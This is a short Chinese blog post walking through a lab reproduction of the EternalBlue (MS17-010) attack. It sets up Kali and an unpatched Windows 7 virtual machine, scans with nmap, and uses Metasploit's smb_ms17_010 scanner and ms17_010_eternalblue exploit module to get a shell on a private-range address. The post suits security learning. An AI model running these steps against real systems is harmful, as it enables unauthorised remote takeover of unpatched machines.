永恒之蓝攻击复现

首先在虚拟机上准备kali和win7(没有打过补丁的)两台虚拟机

在kali上进行操作

查看本机ip

 

 

扫描主机局域网的ip 得到ip和网关

 

nmap扫描主机信息

 

 

启动msfconsole模块

search ms17-010(查找ms17-010的漏洞)

 

use auxiliary/scanner/smb/smb_ms17_010(永恒之蓝扫描模块,可以探测主机是否存在MS17_010漏洞)

输入刚刚探测到的win7的ip    192.168.44.133

set rhosts  192.168.44.133(设置攻击目标)

show options 查看配置参数

 

run 显示主机可能受到此漏洞的攻击

 

use exploit/windows/smb/ms17_010_eternalblue(启用此漏洞攻击模块)

set rhosts 192.168.44.133指定目标

show options 查看配置信息

 exploit 执行攻击
shell 进入win7控制台(设置其他的编码格式可以取消乱码)
show payloads 该命令可以查看当前漏洞利用模块下可用的所有Payload

 

posted @ 2022-05-07 19:04  南海一片心  阅读(132)  评论(0)    收藏  举报